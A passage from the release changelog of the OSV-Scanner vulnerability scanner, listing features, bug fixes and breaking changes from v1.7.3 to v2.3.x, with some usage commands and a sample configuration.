- [Feature #2475](https://github.com/google/osv-scanner/pull/2475) Add base image info to container scanning output header (in table, markdown and vertical formats). ### Misc: - Update Go version to 1.25.7. - Update osv-scalibr from v0.4.1 to v0.4.2. [Release note](https://github.com/google/osv-scalibr/releases/tag/v0.4.2). - Refactor to better align with osv-scalibr plugins and inventory data structure. # v2.3.2 This release includes performance improvements for local scanning, reducing memory usage and avoiding unnecessary advisory loading. It also fixes issues with MCP's get_vulnerability_details tool, git queries in `osv-scanner.json`, and ignore entry tracking, along with documentation updates. ### Fixes: - [Bug #2415](https://github.com/google/osv-scanner/pull/2415) Add more PURL-to-ecosystem mappings - [Bug #2422](https://github.com/google/osv-scanner/pull/2422) MCP error for get_vulnerability_id because type definition is incorrect. - [Bug #2460](https://github.com/google/osv-scanner/pull/2460) Enable osv-scanner.json git queries - [Bug #2456](https://github.com/google/osv-scanner/pull/2456) Properly track if an ignore entry has been used - [Bug #2450](https://github.com/google/osv-scanner/pull/2450) **Performance:** Avoid loading the entire advisory unless it will actually be used - [Bug #2445](https://github.com/google/osv-scanner/pull/2445) **Performance:** Don't read the entire zip into memory - [Bug #2433](https://github.com/google/osv-scanner/pull/2433) Allow specifying user agent in v2 osvscanner package ### Misc: - [Misc #2453](https://github.com/google/osv-scanner/pull/2453) Switch from gopkg.in/yaml.v3 to go.yaml.in/yaml/v3 - [Misc #2447](https://github.com/google/osv-scanner/pull/2447) Include `bun.lock` as a supported lockfile - [Misc #2444](https://github.com/google/osv-scanner/pull/2444) Document GoVersionOverride in configuration.md # v2.3.1 ### Features: - [Feature #2370](https://github.com/google/osv-scanner/pull/2370) Add support for the 
`packagedeprecation` plugin via the new `--experimental-flag-deprecated-packages` flag. The result is available in all output formats except SPDX. ### Fixes: - [Bug #2395](https://github.com/google/osv-scanner/pull/2395) Fix license scanning to correctly match new `deps.dev` package names. - [Bug #2333](https://github.com/google/osv-scanner/pull/2333) Deduplicate SARIF outputs for GitHub. - [Bug #2259](https://github.com/google/osv-scanner/pull/2259) Fix lookup of Go packages with major versions by including the subpath of Go PURLs, preventing false positives. ### Misc: - Updated Go version to v1.25.5 to support Go reachability analysis for the latest version. # v2.3.0 This release migrates to the new `osv.dev` and `osv-schema` proto bindings for its internal data models ([#2328](https://github.com/google/osv-scanner/pull/2328)). This is primarily an internal change and should not impact users. ### Features: - [Feature #2321](https://github.com/google/osv-scanner/pull/2321) Add support for license checks for RubyGems. - [Feature #2294](https://github.com/google/osv-scanner/pull/2294) Replace `requirementsenhanceable` extractor with transitive enricher. - [Feature #2344](https://github.com/google/osv-scanner/pull/2344) Use `osduplicate` annotators. ### Fixes: - [Bug #2329](https://github.com/google/osv-scanner/pull/2329) Add `--ignore-scripts` flag to npm lockfile generation. - [Bug #2311](https://github.com/google/osv-scanner/pull/2311) Improve logic for `--all-packages` flag. - [Bug #2309](https://github.com/google/osv-scanner/pull/2309) Exit with a non-zero code when showing help. - [Bug #2316](https://github.com/google/osv-scanner/pull/2316) Pre-commit hook now defaults to scanning current directory instead of failing. - [Bug #1507 (osv-scalibr)](https://github.com/google/osv-scalibr/pull/1507) Interpolate Maven projects before extracting repositories. 
# v2.2.4 ### Features: - [Feature #2256](https://github.com/google/osv-scanner/pull/2256) Add experimental OSV-Scanner MCP server. (`osv-scanner experimental-mcp`) - [Feature #2284](https://github.com/google/osv-scanner/pull/2284) Update `osv-scalibr` integration, replacing `baseimagematch` with the base image enricher. - [Feature #2216](https://github.com/google/osv-scanner/pull/2216) Warn when vulnerabilities specified in the ignore config are not found during a scan (fixes \#2206). ### Fixes: - [Bug #2305](https://github.com/google/osv-scanner/pull/2305) Ignore common protocols and `.git` suffix when checking if an advisory affects a git repository (fixes \#2291). - [Bug #2300](https://github.com/google/osv-scanner/pull/2300) Ensure the global logger is used in `cmdlogger` and `osv-scalibr` when set (fixes \#2081). - [Bug #2295](https://github.com/google/osv-scanner/pull/2295) Fix Go stdlib license result matching (fixes \#2191). # v2.2.3 ### Features: - [Feature #2209](https://github.com/google/osv-scanner/pull/2209) Add support for resolving git packages that have a version specified. - [Feature #2210](https://github.com/google/osv-scanner/pull/2210) Make the `--experimental-plugins` flag additive by default, and introduce a new `--experimental-no-default-plugins` flag. - [Feature #2203](https://github.com/google/osv-scanner/pull/2203) Update `osv-scalibr` to 0.3.4 for improved dependency extraction. See osv-scalibr changelog for additional information. ### Fixes: - [Bug #2214](https://github.com/google/osv-scanner/pull/2214) Fix issue where `input.Path` was incorrectly constructed on Windows when using the `-L` flag. - [Fix #2241](https://github.com/google/osv-scanner/pull/2241) **Performance:** Greatly reduce memory usage in the local matcher by only loading advisories relevant to the packages being scanned. 
# v2.2.2 ### Features: - [Feature #2113](https://github.com/google/osv-scanner/pull/2113) Add support for Java reachability analysis to identify uncalled vulnerabilities in JAR files. - [Feature #2177](https://github.com/google/osv-scanner/pull/2177) Automatically parse `osv-scanner-custom.json` files as `osv-scanner.json` custom lockfiles. ### Fixes: - [Bug #2204](https://github.com/google/osv-scanner/pull/2204) Add a warning to guide users to the correct GitHub Action. - [Bug #2202](https://github.com/google/osv-scanner/pull/2202) Fix incorrect exit code when unimportant vulnerabilities are found in non-container scans. - [Bug #2188](https://github.com/google/osv-scanner/pull/2188) Fix handling of absolute paths on Windows. # v2.2.1 ### Fixes - [Bug #2151](https://github.com/google/osv-scanner/issues/2151) Filter by ecosystem before querying. # v2.2.0 OSV-Scanner now supports all OSV-Scalibr features behind experimental flags (`--experimental-plugins`, see details [here](https://google.github.io/osv-scanner/experimental/manual-plugin-selection/))! ### Features: - [Feature #2146](https://github.com/google/osv-scanner/pull/2146) Allow manual OSV-Scalibr plugin selection. - [Feature #2144](https://github.com/google/osv-scanner/pull/2144) Add OSV-Scalibr version to osv-scanner --version output. - [Feature #2021](https://github.com/google/osv-scanner/pull/2021) Add experimental support for running OSV-Scalibr detectors. - [Feature #2079](https://github.com/google/osv-scanner/pull/2079) Fall back to offline extractor if the transitive one fails, so at least direct dependencies are returned. - [Feature #2032](https://github.com/google/osv-scanner/pull/2032) Add summary section at the top of outputs and a 'Fixed Version' column. - [Feature #2076](https://github.com/google/osv-scanner/pull/2076) Support Ubuntu severity type. ### Fixes: - [Bug #2141](https://github.com/google/osv-scanner/pull/2141) Fix OSV-Scanner json scans not matching with correct ecosystem. 
- [Bug #2084](https://github.com/google/osv-scanner/pull/2084) Show absolute paths when scanning containers. - [Bug #2126](https://github.com/google/osv-scanner/pull/2126) Log and preserve package count before continuing on db error. - [Bug #2095](https://github.com/google/osv-scanner/pull/2095) Pass through plugin capabilities correctly. - [Bug #2051](https://github.com/google/osv-scanner/pull/2051) Properly flag if running on Linux or Mac OSs for plugin compatibility. - [Bug #2072](https://github.com/google/osv-scanner/pull/2072) Add missing "text" property in description fields. - [Bug #2068](https://github.com/google/osv-scanner/pull/2068) Change links in output to go to the specific vulnerability page instead of the list page. - [Bug #2064](https://github.com/google/osv-scanner/pull/2064) Fix SARIF v3 output to include results. ### API Changes: - [API Change #2096](https://github.com/google/osv-scanner/pull/2096) Allow log handler to be overridden. # v2.1.0 ### Features: - [Feature #2038](https://github.com/google/osv-scanner/pull/2038) Add CycloneDX location field to the output source string. - [Feature #2036](https://github.com/google/osv-scanner/pull/2036) Include upstream source information in vulnerability grouping to improve accuracy. - [Feature #1970](https://github.com/google/osv-scanner/pull/1970) Hide unimportant vulnerabilities by default to reduce noise, and adds a `--show-all-vulns` flag to show all. - [Feature #2003](https://github.com/google/osv-scanner/pull/2003) Add experimental summary output format for the reporter. - [Feature #1988](https://github.com/google/osv-scanner/pull/1988) Add support for CycloneDX 1.6 report format. - [Feature #1987](https://github.com/google/osv-scanner/pull/1987) Add support for `gems.locked` files used by Bundler. - [Feature #1980](https://github.com/google/osv-scanner/pull/1980) Enable transitive dependency extraction for Python `requirements.txt` files. 
- [Feature #1961](https://github.com/google/osv-scanner/pull/1961) Deprecate the `--sbom` flag in favor of the existing `-L/--lockfile` flag for scanning SBOMs. - [Feature #1963](https://github.com/google/osv-scanner/pull/1963) Stabilize various experimental fields in the output by moving them out of the experimental struct. - [Feature #1957](https://github.com/google/osv-scanner/pull/1957) Use a dedicated exit code for invalid configuration files. ### Fixes: - [Bug #2046](https://github.com/google/osv-scanner/pull/2046) Correctly set the user agent string for all outgoing requests. - [Bug #2019](https://github.com/google/osv-scanner/pull/2019) Use more natural language in the descriptions for extractor-related flags. - [Bug #1982](https://github.com/google/osv-scanner/pull/1982) Correctly parse Ubuntu package information with suffixes (e.g. `:Pro`, `:LTS`). - [Bug #2000](https://github.com/google/osv-scanner/pull/2000) Ensure CDATA content in XML is correctly outputted in guided remediation. - [Bug #1949](https://github.com/google/osv-scanner/pull/1949) Fix filtering of package types in vulnerability counts. # v2.0.3 ### Features: - [Feature #1943](https://github.com/google/osv-scanner/pull/1943) Added a flag to suppress "no package sources found" error. - [Feature #1844](https://github.com/google/osv-scanner/pull/1844) Allow flags to be passed after scan targets, e.g. `osv-scanner ./scan-this-dir --format=vertical`, by updating to cli/v3 - [Feature #1882](https://github.com/google/osv-scanner/pull/1882) Added a `stable` tag to container images for releases that follow semantic versioning. - [Feature #1846](https://github.com/google/osv-scanner/pull/1846) Experimental: Add `--experimental-extractors` and `--experimental-disable-extractors` flags to allow for more granular control over which OSV-Scalibr dependency extractors are used. 
### Fixes: - [Bug #1856](https://github.com/google/osv-scanner/pull/1856) Improve XML output by guessing and matching the indentation of existing `` elements. - [Bug #1850](https://github.com/google/osv-scanner/pull/1850) Prevent escaping of single quotes in XML attributes for better readability and correctness. - [Bug #1922](https://github.com/google/osv-scanner/pull/1922) Prevent a potential panic in `MatchVulnerabilities` when the API response is nil, particularly on timeout. - [Bug #1916](https://github.com/google/osv-scanner/pull/1916) Add the "ubuntu" namespace to the debian purl type to correctly parse dpkg BOMs generated on Ubuntu. - [Bug #1871](https://github.com/google/osv-scanner/pull/1871) Ensure inventories are sorted by PURL in addition to name and version to prevent incorrect deduplication of packages. - [Bug #1919](https://github.com/google/osv-scanner/pull/1919) Improve error reporting by including the underlying error when the response body from a Maven registry cannot be read. - [Bug #1857](https://github.com/google/osv-scanner/pull/1857) Fix an issue where SPDX output is not correctly outputted because it was getting overwritten. - [Bug #1873](https://github.com/google/osv-scanner/pull/1873) Fix the GitHub Action to not ignore general errors during execution. - [Bug #1955](https://github.com/google/osv-scanner/pull/1955) Fix issue causing error messages to be spammed when not running in a git repository. - [Bug #1930](https://github.com/google/osv-scanner/pull/1930) Fix issue where Maven client loses auth data during extraction. ### Misc: - Update dependencies and updated golang to 1.24.4 # v2.0.2 ### Fixes: - [Bug #1842](https://github.com/google/osv-scanner/pull/1842) Fix an issue in the GitHub Action where call analysis for Go projects using the `tool` directive (Go 1.24+) in `go.mod` files would fail. The scanner image has been updated to use a newer Go version. 
- [Bug #1806](https://github.com/google/osv-scanner/pull/1806) Fix an issue where license overrides were not correctly reflected in the final scan results and license summary. - [Fix #1825](https://github.com/google/osv-scanner/pull/1825), [#1809](https://github.com/google/osv-scanner/pull/1809), [#1805](https://github.com/google/osv-scanner/pull/1805), [#1803](https://github.com/google/osv-scanner/pull/1803), [#1787](https://github.com/google/osv-scanner/pull/1787) Enhance XML output stability and consistency by preserving original spacing and minimizing unnecessary escaping. This helps reduce differences when XML files are processed. # v2.0.1 ### Features: - [Feature #1730](https://github.com/google/osv-scanner/pull/1730) Add support for extracting dependencies from .NET `packages.config` and `packages.lock.json` files. - [Feature #1770](https://github.com/google/osv-scanner/pull/1770) Add support for extracting dependencies from Rust binaries compiled with cargo-auditable. - [Feature #1761](https://github.com/google/osv-scanner/pull/1761) Improve output when scanning for OS packages: binary packages associated with a source package are now shown in the table output. ### Fixes: - [Bug #1752](https://github.com/google/osv-scanner/pull/1752) Fix paging depth issue when querying the osv.dev API. - [Bug #1747](https://github.com/google/osv-scanner/pull/1747) Ensure osv-reporter prints warnings instead of errors for certain messages to return correct exit code (related to [osv-scanner-action#65](https://github.com/google/osv-scanner-action/issues/65)). - [Bug #1717](https://github.com/google/osv-scanner/pull/1717) Fix issue where nested CycloneDX components were not being parsed. - [Bug #1744](https://github.com/google/osv-scanner/pull/1744) Fix issue where empty CycloneDX SBOMs were causing a panic. - [Bug #1726](https://github.com/google/osv-scanner/pull/1726) De-duplicate references in CycloneDX report output for improved validity. 
- [Bug #1727](https://github.com/google/osv-scanner/pull/1727) Remove automatic opening of HTML reports in the browser (fixes [#1721](https://github.com/google/osv-scanner/issues/1721)). - [Bug #1735](https://github.com/google/osv-scanner/pull/1735) Require a tag when scanning container images to prevent potential errors. ### Docs: - [Docs #1753](https://github.com/google/osv-scanner/pull/1753) Correct documentation for the OSV-Scanner GitHub Action (fixes [osv-scanner-action#68](https://github.com/google/osv-scanner-action/issues/68)). - [Docs #1743](https://github.com/google/osv-scanner/pull/1743) Minor grammar fixes in documentation. ### API Changes: - [API Change #1763](https://github.com/google/osv-scanner/pull/1763) Made the SourceType enum public. # OSV-Scanner v2.0.0 This release merges the improvements, features, and fixes from v2.0.0-rc1, v2.0.0-beta2, and v2.0.0-beta1. **Important:** This release includes several breaking changes aimed at future-proofing OSV-Scanner. Please consult our comprehensive **[Migration Guide](https://google.github.io/osv-scanner/migration-guide.html)** to ensure a smooth upgrade. ### Features: - **Layer and base image-aware container scanning:** - Rewritten support for Debian, Ubuntu, and Alpine container images. - Layer level analysis and vulnerability breakdown. - Supports Go, Java, Node, and Python artifacts within supported distros. - Base image identification via `deps.dev`. - Usage: `osv-scanner scan image <image-name>:<tag>` - **Interactive HTML output:** - Severity breakdown, package/ID/importance filtering, vulnerability details. - Container image layer filtering, layer info, base image identification. - Usage: `osv-scanner scan --serve ...` - **Guided Remediation for Maven pom.xml:** - Remediate direct and transitive dependencies (non-interactive mode). - New `override` remediation strategy. - Support for reading/writing `pom.xml` and parent POM files. - Private registry support for Maven metadata. 
- Machine-readable output for guided remediation. - **Enhanced Dependency Extraction with `osv-scalibr`:** - Haskell: `cabal.project.freeze`, `stack.yaml.lock` - .NET: `deps.json` - Python: `uv.lock` - Artifacts: `node_module`s, Python wheels, Java uber jars, Go binaries - [Feature #1636](https://github.com/google/osv-scanner/pull/1636) `osv-scanner update` command for updating the local vulnerability database (formerly experimental). - [Feature #1582](https://github.com/google/osv-scanner/pull/1582) Add container scanning information to vertical output format. - [Feature #1587](https://github.com/google/osv-scanner/pull/1587) Add support for severity in SARIF report format. - [Feature #1569](https://github.com/google/osv-scanner/pull/1569) Add support for `bun.lock` lockfiles. - [Feature #1547](https://github.com/google/osv-scanner/pull/1547) Add experimental config support to the `scan image` command. - [Feature #1557](https://github.com/google/osv-scanner/pull/1557) Allow setting port number with `--serve` using the new `--port` flag. ### Breaking Changes: - [Feature #1670](https://github.com/google/osv-scanner/pull/1670) Guided remediation now defaults to non-interactive mode; use the `--interactive` flag for interactive mode. - [Feature #1670](https://github.com/google/osv-scanner/pull/1686) Removed the `--verbosity=verbose` verbosity level. - [Feature #1673](https://github.com/google/osv-scanner/pull/1673) & [Feature #1664](https://github.com/google/osv-scanner/pull/1664) All previous experimental flags are now out of experimental, and the experimental flag mechanism has been removed. - [Feature #1651](https://github.com/google/osv-scanner/pull/1651) Multiple license flags have been merged into a single `--license` flag. - [Feature #1666](https://github.com/google/osv-scanner/pull/1666) API: `reporter` removed; logging now uses `slog`, which can be overridden. 
- [Feature #1638](https://github.com/google/osv-scanner/pull/1638) API: Deprecated packages removed, including `lockfile` (migrated to `OSV-Scalibr`). ### Improvements: - [Feature #1561](https://github.com/google/osv-scanner/pull/1561) Updated HTML report for better contrast and usability (from beta2). - [Feature #1584](https://github.com/google/osv-scanner/pull/1584) Make skipping the root git repository the default behavior (from beta2). - [Feature #1648](https://github.com/google/osv-scanner/pull/1648) Updated HTML report styling to improve contrast (from rc1). ### Fixes: - [Fix #1598](https://github.com/google/osv-scanner/pull/1598) Fix table output vulnerability ordering. - [Fix #1616](https://github.com/google/osv-scanner/pull/1616) Filter out Ubuntu unimportant vulnerabilities. - [Fix #1585](https://github.com/google/osv-scanner/pull/1585) Fixed issue where base images are occasionally duplicated. - [Fix #1597](https://github.com/google/osv-scanner/pull/1597) Fixed issue where SBOM parsers are not correctly parsing CycloneDX files when using the `bom.xml` filename. - [Fix #1566](https://github.com/google/osv-scanner/pull/1566) Fixed issue where offline scanning returns different results from online scanning. - [Fix #1538](https://github.com/google/osv-scanner/pull/1538) Reduce memory usage when using guided remediation. We encourage everyone to upgrade to OSV-Scanner v2.0.0 and experience these powerful new capabilities! As always, your feedback is invaluable, so please don't hesitate to share your thoughts and suggestions. - [General V2 feedback](https://github.com/google/osv-scanner/discussions/1529) - [Container scanning feedback](https://github.com/google/osv-scanner/discussions/1521) # v2.0.0-rc1 Our first release candidate for OSV-Scanner V2, which includes various breaking changes to help future-proof osv-scanner in V2! See the changelog for beta1 and beta2 for the full list of changes. 
We've also added a migration guide here: https://google.github.io/osv-scanner/migration-guide.html ### Changes: - [Feature #1670](https://github.com/google/osv-scanner/pull/1670) Guided remediation now makes non-interactive the default mode, and adds the `--interactive` flag. - [Feature #1670](https://github.com/google/osv-scanner/pull/1686) Removes the `--verbosity=verbose` verbosity level. - [Feature #1673](https://github.com/google/osv-scanner/pull/1673) & [Feature #1664](https://github.com/google/osv-scanner/pull/1664) Moves all our experimental flags out of experimental, and removes the experimental flags. - [Feature #1651](https://github.com/google/osv-scanner/pull/1651) License flags have been merged into a single license flag. See `--help` or migration guide for more details. ### Features: - [Feature #1636](https://github.com/google/osv-scanner/pull/1636) `osv-scanner update` command has been released as an experimental feature. - [Feature #1582](https://github.com/google/osv-scanner/pull/1582) Add container scanning related information to vertical output format. - [Feature #1587](https://github.com/google/osv-scanner/pull/1587) Add support for severity in SARIF report format. ### Fixes - [Fix #1677](https://github.com/google/osv-scanner/pull/1677) Fix OS filter for HTML report. - [Fix #1598](https://github.com/google/osv-scanner/pull/1598) Fix table output vulnerability ordering. - [Fix #1661](https://github.com/google/osv-scanner/pull/1661) Add spinner to iframs in the HTML report. - [Fix #1648](https://github.com/google/osv-scanner/pull/1648) Updated HTML report styling to improve contrast. - [Fix #1616](https://github.com/google/osv-scanner/pull/1616) Display git scanning results in HTML report. - [Fix #1616](https://github.com/google/osv-scanner/pull/1616) Filter out Ubuntu unimportant vulnerabilities. 
### API changes - [Feature #1666](https://github.com/google/osv-scanner/pull/1666) Removes `reporter`, all logging now goes through slog, which you can override to change the output. - [Feature #1638](https://github.com/google/osv-scanner/pull/1638) All deprecated packages have been removed from the osv-scanner module, this includes the `lockfile` package, which has been migrated to the `OSV-Scalibr` library. # v2.0.0-beta2 This second beta release brings a series of fixes and improvements to the previous release. ### Improvements: - [Feature #1561](https://github.com/google/osv-scanner/pull/1561) Updated HTML report for better contrast and usability - [Feature #1569](https://github.com/google/osv-scanner/pull/1569) Add support for bun.lock lockfiles. - [Feature #1584](https://github.com/google/osv-scanner/pull/1584) Make skip root git repository the default behavior. - [Feature #1547](https://github.com/google/osv-scanner/pull/1547) Add experimental config support to the image command. - [Feature #1557](https://github.com/google/osv-scanner/pull/1557) Allow setting port number when using the `--serve` flag with the new `--port` flag. ### Fixes - [Fix #1585](https://github.com/google/osv-scanner/pull/1585) Fixed issue where base images are occasionally duplicated. - [Fix #1597](https://github.com/google/osv-scanner/pull/1597) Fixed issue where SBOM parsers are not correctly parsing CycloneDX files when using the `bom.xml` filename. - [Fix #1566](https://github.com/google/osv-scanner/pull/1566) Fixed issue where offline scanning returns different results from online scanning. - [Fix #1538](https://github.com/google/osv-scanner/pull/1538) Reduce memory usage when using guided remediation. # v2.0.0-beta1 The first beta of OSV-Scanner V2 is here! This beta release introduces significant enhancements, including refactored dependency extraction capabilities, container image scanning, and guided remediation for Maven. 
This beta release does _not_ introduce any breaking CLI changes and the beta period is expected to last approximately one month. However, as this is a beta release, there may be breaking changes in the final release compared to the first beta. We encourage you to try out these new features and would appreciate any feedback you might have on our discussion topics: - [General V2 feedback](https://github.com/google/osv-scanner/discussions/1529) - [Container scanning feedback](https://github.com/google/osv-scanner/discussions/1521) ### Layer and base image-aware container scanning A significant new feature is a rewritten, layer-aware container scanning support for Debian, Ubuntu, and Alpine container images. OSV-Scanner can now analyze container images to provide: - Layers where a package was first introduced - Layer history and commands - Base images the image is based on - OS/Distro the container is running on This layer analysis leverages [OSV-Scalibr](https://github.com/google/osv-scalibr), and supports the following OSes and languages: | Distro Support | Language Artifacts Support | | -------------- | -------------------------- | | Alpine OS | Go | | Debian | Java | | Ubuntu | Node | | | Python | Base image identification also leverages a new experimental API provided by https://deps.dev. For usage, run the new `scan image` command: ``` osv-scanner scan image <image-name>:<tag> ``` Check out our [documentation](https://google.github.io/osv-scanner/usage/scan-image) for more details. ### Interactive HTML output A new, interactive HTML output is now available. 
This provides a lot more interactivity and information compared to terminal only outputs, including: - Severity breakdown - Package and ID filtering - Vulnerability importance filtering - Full vulnerability advisory entries And additionally for container image scanning: - Layer filtering - Image layer information - Base image identification ![Screenshot of HTML output for container image scanning](./docs/images/html-container-output.png) ### Guided Remediation for Maven pom.xml Last year we released a feature called [guided remediation](https://osv.dev/blog/posts/announcing-guided-remediation-in-osv-scanner/) for npm. We have now expanded support to Maven pom.xml. With guided remediation support for Maven, you can remediate vulnerabilities in both direct and transitive dependencies through direct version updates or overriding versions through dependency management. We’ve introduced a few new features for our Maven support: - A new remediation strategy `override` is introduced. - Support for reading and writing pom.xml files, including writing changes to local parent pom files. - Private registry can be specified to fetch Maven metadata. The guided remediation support for Maven is only available in the non-interactive mode. For basic usage, run the following command: ``` osv-scanner fix --non-interactive --strategy=override -M path/to/pom.xml ``` We also introduced machine readable output for guided remediation that makes it easier to integrate guided remediation into your workflow. For more usage details on guided remediation, please see our [documentation](https://google.github.io/osv-scanner/experimental/guided-remediation/). 
### Enhanced Dependency Extraction with `osv-scalibr` With the help from [OSV-Scalibr](https://github.com/google/osv-scalibr), we now also have expanded support for the kinds of dependencies we can extract from projects and containers: #### Source manifests and lockfiles - Haskell: `cabal.project.freeze`, `stack.yaml.lock` - .NET: `deps.json` - Python: `uv.lock` #### Artifacts - node_modules - Python wheels - Java uber jars - Go binaries The full list of supported formats can be found [here](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/). The first beta doesn’t enable every single extractor currently available in OSV-Scalibr today. We’ll continue to add more leading up to the final 2.0.0 release. OSV-Scalibr also makes it incredibly easy to add new extractors. Please file a [feature request](https://github.com/google/osv-scalibr/issues) if a format you’re interested in is missing! # v1.9.1 ### Features: - [Feature #1295](https://github.com/google/osv-scanner/pull/1295) Support offline database in fix subcommand. - [Feature #1342](https://github.com/google/osv-scanner/pull/1342) Add `--experimental-offline-vulnerabilities` and `--experimental-no-resolve` flags. - [Feature #1045](https://github.com/google/osv-scanner/pull/1045) Support private registries for Maven. - [Feature #1226](https://github.com/google/osv-scanner/pull/1226) Support `vulnerabilities.ignore` in package overrides. ### Fixes: - [Bug #604](https://github.com/google/osv-scanner/pull/604) Use correct path separator in SARIF output when on Windows. - [Bug #330](https://github.com/google/osv-scanner/pull/330) Warn about and ignore duplicate entries in SBOMs. - [Bug #1325](https://github.com/google/osv-scanner/pull/1325) Set CharsetReader and Entity when reading pom.xml. - [Bug #1310](https://github.com/google/osv-scanner/pull/1310) Update spdx license ids. - [Bug #1288](https://github.com/google/osv-scanner/pull/1288) Sort sbom packages by PURL. 
- [Bug #1285](https://github.com/google/osv-scanner/pull/1285) Improve handling if `docker` exits with a non-zero code when trying to scan images ### API Changes: - Deprecate auxiliary public packages: As part of the V2 update described above, we have started deprecating some of the auxiliary packages which are not commonly used to give us more room to make better API designs. These include: - `config` - `depsdev` - `grouper` - `spdx` # v1.9.0 ### Features: - [Feature #1243](https://github.com/google/osv-scanner/pull/1243) Allow explicitly ignoring the license of a package in config with `license.ignore = true`. - [Feature #1249](https://github.com/google/osv-scanner/pull/1249) Error if configuration file has unknown properties. - [Feature #1271](https://github.com/google/osv-scanner/pull/1271) Assume `.txt` files with "requirements" in their name are `requirements.txt` files ### Fixes: - [Bug #1242](https://github.com/google/osv-scanner/pull/1242) Announce when a config file is invalid and exit with a non-zero code. - [Bug #1241](https://github.com/google/osv-scanner/pull/1241) Display `(no reason given)` when there is no reason in the override config. - [Bug #1252](https://github.com/google/osv-scanner/pull/1252) Don't allow `LoadPath` to be set via config file. - [Bug #1279](https://github.com/google/osv-scanner/pull/1279) Report all ecosystems without local databases in one single line. - [Bug #1283](https://github.com/google/osv-scanner/pull/1283) Output invalid PURLs when scanning SBOMs. - [Bug #1278](https://github.com/google/osv-scanner/pull/1278) Apply go version override to _all_ instances of the `stdlib`. ### Misc: - [#1253](https://github.com/google/osv-scanner/pull/1253) Deprecate `ParseX()` functions in `pkg/lockfile` in favor of their `Extract` equivalents. - [#1290](https://github.com/google/osv-scanner/pull/1290) Bump maximum number of concurrent requests to the OSV.dev API. 
# v1.8.5: ### Features: - [Feature #1160](https://github.com/google/osv-scanner/pull/1160) Support fetching snapshot versions from a Maven registry. - [Feature #1177](https://github.com/google/osv-scanner/pull/1177) Support composite-based package overrides. This allows for ignoring entire manifests when scanning. - [Feature #1210](https://github.com/google/osv-scanner/pull/1210) Add FIXED-VULN-IDS to guided remediation non-interactive output. ### Fixes: - [Bug #1220](https://github.com/google/osv-scanner/issues/1220) Fix govulncheck calls on C code. - [Bug #1236](https://github.com/google/osv-scanner/pull/1236) Alpine package scanning now falls back to latest release version if no release version can be found. # v1.8.4: ### Features: - [Feature #1177](https://github.com/google/osv-scanner/pull/1177) Adds `--upgrade-config` flag for configuring allowed upgrades on a per-package basis. Also hide & deprecate previous `--disallow-major-upgrades` and `--disallow-package-upgrades` flags. ### Fixes: - [Bug #1123](https://github.com/google/osv-scanner/issues/1123) Issue when running osv-scanner on project running with golang 1.22 #1123 ### Misc: - [Feature #638](https://github.com/google/osv-scanner/issues/638) Update go policy to use stable go version for builds (updated to go 1.23) # v1.8.3: ### Features: - [Feature #889](https://github.com/google/osv-scanner/pull/889) OSV-Scanner now provides "vertical" output format! ### Fixes: - [Bug #1115](https://github.com/google/osv-scanner/issues/1115) Ensure that `semantic` is passed a valid `models.Ecosystem`. - [Bug #1140](https://github.com/google/osv-scanner/pull/1140) Add Maven dependency management to override client. - [Bug #1149](https://github.com/google/osv-scanner/pull/1149) Handle Maven parent relative path. ### Misc: - [Feature #1091](https://github.com/google/osv-scanner/pull/1091) Improved the runtime of DiffVulnerabilityResults. Thanks @neilnaveen! 
- [Feature #1125](https://github.com/google/osv-scanner/pull/1125) Workflow for stale issue and PR management. # v1.8.2: ### Features: - [Feature #1014](https://github.com/google/osv-scanner/pull/1014) Adding CycloneDX 1.4 and 1.5 output format. Thanks @marcwieserdev! ### Fixes: - [Bug #769](https://github.com/google/osv-scanner/issues/769) Fixed missing vulnerabilities for debian purls for `--experimental-local-db`. - [Bug #1055](https://github.com/google/osv-scanner/issues/1055) Ensure that `package` exists in `affected` property. - [Bug #1072](https://github.com/google/osv-scanner/issues/1072) Filter out unimportant vulnerabilities from vuln group. - [Bug #1077](https://github.com/google/osv-scanner/issues/1077) Fix rate osv-scanner deadlock. - [Bug #924](https://github.com/google/osv-scanner/issues/924) Ensure that npm dependencies retain their "production" grouping. # v1.8.0/v1.8.1: ### Features: - [Feature #35](https://github.com/google/osv-scanner/issues/35) OSV-Scanner now scans transitive dependencies in Maven `pom.xml` files! See [our documentation](https://google.github.io/osv-scanner/supported-languages-and-lockfiles/#transitive-dependency-scanning) for more information. 
- [Feature #944](https://github.com/google/osv-scanner/pull/944) The `osv-scanner.toml` configuration file can now filter specific packages with new `[[PackageOverrides]]` sections: ```toml [[PackageOverrides]] # The package name, version, and ecosystem to match against name = "lib" # If version is not set or empty, it will match every version version = "1.0.0" ecosystem = "Go" # Ignore this package entirely, including license scanning ignore = true # Override the license of the package # This is not used if ignore = true license.override = ["MIT", "0BSD"] # effectiveUntil = 2022-11-09 # Optional exception expiry date reason = "abc" ``` ### Minor Updates - [Feature #1039](https://github.com/google/osv-scanner/pull/1039) The `--experimental-local-db` flag has been removed and replaced with a new flag `--experimental-download-offline-databases` which better reflects what the flag does. To replicate the behavior of the original `--experimental-local-db` flag, replace it with both `--experimental-offline --experimental-download-offline-databases` flags. This will run osv-scanner in offline mode, but download the latest version of the vulnerability databases before scanning. ### Fixes: - [Bug #1000](https://github.com/google/osv-scanner/pull/1000) Standard dependencies now correctly override `dependencyManagement` dependencies when scanning `pom.xml` files in offline mode. # v1.7.4: ### Features: - [Feature #943](https://github.com/google/osv-scanner/pull/943) Support scanning gradle/verification-metadata.xml files. ### Misc: - [Bug #968](https://github.com/google/osv-scanner/issues/968) Hide unimportant Debian vulnerabilities to reduce noise. # v1.7.3: ### Features: - [Feature #934](https://github.com/google/osv-scanner/pull/934) add support for PNPM v9 lockfiles. ### Fixes: - [Bug #938](https://github.com/google/osv-scanner/issues/938) Ensure the sarif output has a stable order. 
